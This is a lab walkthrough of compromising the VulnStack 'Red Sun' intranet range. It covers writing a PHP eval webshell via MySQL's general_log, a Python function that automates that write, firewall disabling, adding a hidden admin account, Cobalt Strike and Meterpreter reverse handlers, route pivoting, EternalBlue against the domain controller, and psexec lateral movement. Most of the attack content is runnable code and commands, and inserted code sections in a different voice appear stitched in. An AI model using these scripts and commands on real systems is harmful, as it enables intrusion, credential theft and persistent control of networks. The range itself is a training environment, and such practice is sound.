Red Sun Practice 1:
Foreword:
VulnStack is a cyber range knowledge platform built by the Red Sun Security Team. The range environments (CMS, vulnerability management, domain management, etc.) all mimic the business setups common in domestic enterprises. The environment design follows the ATT&CK red team assessment model: the ranges are built and the challenges are designed around environment construction, vulnerability exploitation, intranet collection, lateral movement, channel construction, persistent control, trace cleaning and so on. To learn more about intranet penetration, this article studies and records the penetration of an intranet domain range environment provided by the Red Sun Security Team.
Table of Contents
Red Sun Practice 1:
Foreword:
Environment preparation:
1. Information collection:
1. Port scan:
2. Directory scanning:
2. Web penetration:
1. MySQL log import webshell
2. AntSword connection
3. yxcms front-end template webshell
4. AntSword connection
3. Intranet penetration
1. CS part
1.1 Create a user and turn off the firewall
1.2 CS online
1.3 Elevate privileges + collect intranet information
1.4 Intra-domain network information collection
2. Lateral movement in the intranet:
2.1 CS linkage with msf
2.2 Determine whether it is a honeypot
2.3 Static routing configuration
2.4 Use the msf module to scan LAN ports
2.5 Scan for EternalBlue
2.6 EternalBlue attack on the domain controller to obtain a shell:
Method 2: CS psexec lateral movement
Environment preparation:
Environment: Kali attack machine, Win7 target (web server), Win2008 domain controller, Win2003 domain member.
Network topology diagram:
Network adapter configuration (VMware):
win7: faces both the external network and the intranet, so it needs two network adapters.
win2008:
win2003:
1. Information collection:
1.Port scan:
Scan from Kali with nmap: ports 80 and 3306 are open.
nmap -sV 192.168.31.161
Visiting http://192.168.31.161 shows a PHP probe page, which tells us the site was set up with phpStudy.
2. Directory scanning:
Scan with dirmap: it finds beifen.rar and the phpMyAdmin management page. Extracting beifen.rar reveals the yxcms source code.
-> Found http://192.168.31.161/yxcms
./dirmap -i http://192.168.31.161 -lcf
Brute-forcing the phpMyAdmin login turns up the weak credential root/root.
Log in to the phpMyAdmin backend:
2. Web Penetration:
At this point we need a way to write a webshell, which requires the absolute path of the web root; here it is C:/phpStudy/www, phpStudy's default.
1. MySQL log import webshell
Check the log status:
show variables like '%general%';
Turn on the general query log:
SET GLOBAL general_log='on';
Point the log file at a PHP file under the web root:
SET GLOBAL general_log_file='C:/phpStudy/www/1.php';
Write the one-line webshell by running a query that contains it (the query text is logged into 1.php):
SELECT '<?php eval($_POST["cmd"]);?>';
2. AntSword connection
The one-line webshell was written successfully (demo.php). Connecting to it with AntSword works.
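As an added example (not code from the original write-up), the Python below scripts the general_log trick above with the two checks a practitioner wants around it: confirm the account is actually allowed to run SET GLOBAL before touching anything, and restore the previous general_log / general_log_file afterwards so the server is not left logging every query into the web root. The function talks to MySQL only through a caller-supplied run_query callable (a hypothetical name; wrapping a DB-API cursor's execute/fetchall works), and the FakeMySQL class is a constructed stand-in so the block runs offline. The path and payload are the ones used on the page.

```python
from typing import Callable, Dict, List, Tuple

Row = Tuple[str, ...]
QueryRunner = Callable[[str], List[Row]]   # hypothetical: runs one SQL statement, returns rows

WEBSHELL = '<?php eval($_POST["cmd"]);?>'
TARGET = "C:/phpStudy/www/1.php"            # web root path from the page


def can_set_global(run_query: QueryRunner) -> bool:
    """SET GLOBAL needs SUPER (MySQL 5.x) or SYSTEM_VARIABLES_ADMIN (8.x).
    root/root on a phpStudy install has ALL PRIVILEGES; a minimal phpMyAdmin
    user does not, and the technique then fails before anything is written."""
    grants = " ".join(row[0] for row in run_query("SHOW GRANTS"))
    return any(p in grants for p in ("ALL PRIVILEGES", "SUPER", "SYSTEM_VARIABLES_ADMIN"))


def current_log_settings(run_query: QueryRunner) -> Dict[str, str]:
    """Read general_log and general_log_file so they can be restored later."""
    return {name: value for name, value in run_query("SHOW VARIABLES LIKE 'general_log%'")}


def sql_string(value: str) -> str:
    """Quote a value as a MySQL string literal (a quote is escaped by doubling it)."""
    return "'" + value.replace("'", "''") + "'"


def write_webshell_via_general_log(run_query: QueryRunner, target_path: str = TARGET,
                                   payload: str = WEBSHELL) -> List[str]:
    """Point the general query log at target_path, log one SELECT that carries the
    PHP payload, then put the log back the way it was. Returns the statements run,
    in order, for the operator's record. secure_file_priv does not apply to
    general_log_file, which is why this works when SELECT ... INTO OUTFILE is blocked;
    the mysqld service account must still be able to write into the web root."""
    if not can_set_global(run_query):
        raise PermissionError("account cannot SET GLOBAL; general_log trick not possible")

    before = current_log_settings(run_query)
    old_state = before.get("general_log", "OFF")
    old_file = before.get("general_log_file", "")

    statements = [
        f"SET GLOBAL general_log_file = {sql_string(target_path)}",
        "SET GLOBAL general_log = 'ON'",
        # This SELECT is what lands in the file, as a line like
        #   <timestamp> <thread id> Query  SELECT '<?php eval($_POST["cmd"]);?>'
        # PHP executes only what sits inside <?php ... ?>; the log prefix is ignored.
        f"SELECT {sql_string(payload)}",
        # Restore the file first (this statement is itself still logged into the
        # webshell file, harmlessly), then the on/off state.
        f"SET GLOBAL general_log_file = {sql_string(old_file)}",
        f"SET GLOBAL general_log = {sql_string(old_state)}",
    ]
    for stmt in statements:
        run_query(stmt)
    return statements


class FakeMySQL:
    """Constructed stand-in for a MySQL connection: records every statement and
    emulates SHOW GRANTS / SHOW VARIABLES / SET GLOBAL just enough to exercise the
    function offline. `written` collects what would end up in the webshell file."""

    def __init__(self, grants: str = "GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost'"):
        self.grants = grants
        self.executed: List[str] = []
        self.variables = {"general_log": "OFF",
                          "general_log_file": "C:/phpStudy/MySQL/data/stu1.log"}
        self.written: List[str] = []

    def __call__(self, sql: str) -> List[Row]:
        self.executed.append(sql)
        if self.variables["general_log"] == "ON" and self.variables["general_log_file"] == TARGET:
            self.written.append(sql)
        if sql.startswith("SHOW GRANTS"):
            return [(self.grants,)]
        if sql.startswith("SHOW VARIABLES"):
            return list(self.variables.items())
        if sql.startswith("SET GLOBAL "):
            name, _, value = sql[len("SET GLOBAL "):].partition(" = ")
            self.variables[name] = value.strip("'")
        return []


if __name__ == "__main__":
    db = FakeMySQL()
    for stmt in write_webshell_via_general_log(db):
        print(stmt)
    print("would be written to 1.php:", db.written)
    print("log settings after cleanup:", db.variables)
```

Against a real server the same five statements can be pasted into phpMyAdmin's SQL tab one at a time; the value of running them from code is that the save-and-restore step is never forgotten.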
That completes the attack through phpMyAdmin. Next, visit http://192.168.31.161/yxcms to continue the web penetration.
We use a physical machine to access it. You can see in the announcement that the backend address is http://192.168.31.161/yxcms/index.php?r=admin. Visit and log in.
3. yxcms front-end template webshell
In the front-end template manager, template PHP files can be edited, so a one-line webshell is inserted into one of them; what remains is to find that file's path on disk.
Find the path in the backup source (beifen.rar):
4. AntSword connection
AntSword connects to the template file successfully!
This is the end of the web penetration.
3. Intranet Penetration
The goal is to use the Win7 external-facing server we already control to move laterally into the internal network and take the domain controller. Before that, we need to collect intranet information and work out the composition of the domain and the network topology.
1. CS part
1.1 Create a user and turn off the firewall
netsh advfirewall set allprofiles state off   # turn off the Windows firewall
net user yzy 1qaz@WSX /add                    # add an account
net localgroup administrators yzy /add        # give it local administrator rights
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f   # enable Remote Desktop (port 3389)
Use ipconfig to discover the intranet segment.
1.2 CS online
Start the CS team server on Kali and connect to it from the physical machine.
Going online takes three steps: start a listener, generate the payload, then upload and execute it through the webshell (AntSword).
Set the file attribute to hidden.
1.3 Elevate privileges + collect intranet information
sleep 5            # shorten the beacon check-in interval; the lower the number, the faster the response
shell systeminfo   # OS version, installed patches and other information
systeminfo reveals the domain and the installed patches.
The beacon is now running as SYSTEM; privilege escalation succeeded.
Mimikatz can be used to dump the local users' passwords directly:
1.4 Intra-domain network information collection
The main purpose of collecting intranet information is to find the domain controller and the other hosts in the domain. Commands for collecting intranet information:
net view                                 # list other host names in the LAN
net config Workstation                   # computer name, full name, user name, OS version, workstation, domain, logon domain
net user                                 # local user list
net user /domain                         # domain users
net localgroup administrators            # local administrators group (often contains domain users)
net view /domain                         # how many domains there are
net user username /domain                # details of the specified domain user
net group /domain                        # groups in the domain (the query is answered by the domain controller)
net group "group name" /domain           # members of one domain group
net group "domain admins" /domain        # domain administrators
net group "domain computers" /domain     # other host names in the domain
net group "domain controllers" /domain   # domain controller host name(s); there may be more than one
a. First check how many domains this host is in: only one.
shell net view /domain   # view the domain environment
b. Find the domain controller: it is OWA.
net group "domain controllers" /domain   # view the domain controller
c. List the other hosts in the domain:
net view   # list the other host names in the domain
Organize the intranet information:
Domain name: god.org
Hosts in the domain (three): OWA, ROOT-TVI862UBEH, STU1 (Win7)
Domain controller: OWA (192.168.52.138)
Domain member: ROOT-TVI862UBEH (192.168.52.141)
Win7 intranet IP: 192.168.52.143
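The summary above is assembled by hand from three `net` listings. As an added example (not part of the original write-up), the Python below parses those listings into the same summary, the way a beacon-output post-processor would. The three inputs are constructed samples in the layout of an English Windows `net.exe`; the lab hosts are Chinese-localized, where the headers and status sentence are translated but the dashed rule and the one-entry-per-line/column layout are the same, which is what the parser keys on. Two details worth seeing in code: the domain controller appears in `net group` output as a computer account with a trailing `$` (OWA$), and the `net group ... /domain` banner is where the DNS domain name (god.org) comes from.

```python
import re
from typing import Dict, List, Optional

# Constructed samples of net.exe output (English layout).
NET_VIEW_DOMAIN = """
Domain

-------------------------------------------------------------------------------
GOD
The command completed successfully.
"""

NET_GROUP_DOMAIN_CONTROLLERS = """
The request will be processed at a domain controller for domain god.org.

Group name     Domain Controllers
Comment        All domain controllers in the domain

Members

-------------------------------------------------------------------------------
OWA$
The command completed successfully.
"""

NET_VIEW = r"""
Server Name            Remark

-------------------------------------------------------------------------------
\\OWA
\\ROOT-TVI862UBEH
\\STU1                 Win7 web server
The command completed successfully.
"""


def entries_after_rule(text: str) -> List[str]:
    """Non-empty lines between the dashed rule and the trailing status sentence.
    Status sentences end with a period in any locale ('...successfully.',
    '命令成功完成。'); account and host names never do, so that is the stop
    condition. A \\HOST line is never a status line, even if its remark ends
    with a period."""
    lines = text.splitlines()
    start = next((i for i, line in enumerate(lines) if line.startswith("----")), None)
    if start is None:
        raise ValueError("no dashed rule found: not net.exe list output")
    entries = []
    for line in lines[start + 1:]:
        line = line.strip()
        if not line:
            continue
        if line.endswith((".", "。")) and not line.startswith("\\\\"):
            break
        entries.append(line)
    return entries


def parse_net_view(text: str) -> List[str]:
    """`net view`: one \\\\HOSTNAME per line, optionally followed by a remark."""
    hosts = []
    for line in entries_after_rule(text):
        m = re.match(r"\\\\(\S+)", line)
        if m:
            hosts.append(m.group(1).upper())
    return hosts


def parse_net_view_domain(text: str) -> List[str]:
    """`net view /domain`: one NetBIOS domain name per line."""
    return [line.split()[0].upper() for line in entries_after_rule(text)]


def parse_net_group_members(text: str) -> List[str]:
    """`net group <group> /domain`: members in up to three columns per line.
    Computer accounts carry a trailing '$' (OWA$); strip it to get the host name."""
    members = []
    for line in entries_after_rule(text):
        members.extend(tok.rstrip("$").upper() for tok in line.split())
    return members


def parse_domain_dns_name(text: str) -> Optional[str]:
    """The 'processed at a domain controller for domain X.' banner carries the
    DNS name of the domain (god.org), which the NetBIOS-style listings lack."""
    m = re.search(r"for domain (\S+?)\.?\s*$", text, re.MULTILINE)
    return m.group(1) if m else None


def summarize(view_domain: str, group_dc: str, view: str) -> Dict[str, object]:
    """Combine the three listings into the summary the write-up builds by hand."""
    dcs = parse_net_group_members(group_dc)
    hosts = parse_net_view(view)
    return {
        "netbios_domains": parse_net_view_domain(view_domain),
        "dns_domain": parse_domain_dns_name(group_dc),
        "domain_controllers": dcs,
        "other_hosts": [h for h in hosts if h not in dcs],
    }


if __name__ == "__main__":
    for key, value in summarize(NET_VIEW_DOMAIN, NET_GROUP_DOMAIN_CONTROLLERS, NET_VIEW).items():
        print(f"{key}: {value}")
```

IP addresses are not in any of these listings; the page's 192.168.52.x values come from resolving the names (ping / nslookup) or from the CS net view, so they would be a separate step on top of this parser.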
2. Lateral movement in the intranet:
Next, using Win7 as the pivot, we move laterally to the domain member host and the domain controller in the internal network.
2.1 CS linkage with msf
a. On Kali, start a handler, set the payload, and configure the IP and port.
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.31.216
set lport 6666
exploit
b. In CS, create a new listener that matches the handler.
Spawn the beacon to that listener; a Meterpreter session arrives on Kali.
2.2 Determine whether it is a honeypot
run post/windows/gather/checkvm   # check whether the target is a virtual machine (possible honeypot)
2.3 Static routing configuration
run post/multi/manage/autoroute                                  # load MSF's autoroute module and list the network segments of the current machine
run post/multi/manage/autoroute SUBNET=192.168.52.0 ACTION=ADD   # add a route to the target intranet through this session
2.4 Use the msf module to scan LAN ports
First use the background command to put the current Meterpreter session in the background, then use MSF's own auxiliary/scanner/portscan/tcp module to scan the domain member host 192.168.52.141. Port 445 is open, so MS17-010 (EternalBlue) is worth trying.
background
use auxiliary/scanner/portscan/tcp
set rhosts 192.168.52.141
set ports 80,135-139,445,3306,3389
run
Scanning the domain controller shows port 445 open as well, so next we scan for MS17-010.
2.5 Scan for EternalBlue
search ms17_010                          # find the MSF modules related to MS17-010
use auxiliary/scanner/smb/smb_ms17_010   # load the scanner
set rhosts 192.168.52.141                # host to scan
run                                      # check whether the vulnerability exists
The scan shows the host is vulnerable to EternalBlue:
2.6 EternalBlue attack on the domain controller to obtain a shell:
!! A blue screen is very likely here. Fortunately there was no blue screen and the attack succeeded, but no shell was obtained...
My guess is that session 1 already in the background prevents the shell from being obtained.
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhosts 192.168.52.138
run
The picture below is an example of a successful attack:
Method 2: CS psexec lateral movement
Principle: SMB Beacon
An SMB Beacon communicates through its parent Beacon over a named pipe. When two Beacons are linked, the child Beacon receives its tasks from the parent and returns its output through it. Because linked Beacons talk over Windows named pipes, the traffic is encapsulated in the SMB protocol, which makes SMB Beacons relatively stealthy. An SMB Beacon has no reverse-connecting payload of its own; it is brought online either with psexec or as a stageless payload.
With an SMB Beacon, credentials captured on a host that already has a Beacon can be reused to push an SMB Beacon onto another machine that has port 445 open. A target that cannot reach the Internet can still be brought online this way, since its Beacon talks back through the parent.
Conditions of use:
The host receiving the Beacon must accept connections on port 445.
Only Beacons managed by the same Cobalt Strike instance can be linked.
You must have administrator privileges on the target host, or credentials with administrator privileges.
Continue here by creating an SMB listener, then try the captured password: use the domain account to psexec onto the other hosts; the link back to the parent Beacon is the tunnel.
The same method works for the domain member: it also comes online, also as SYSTEM.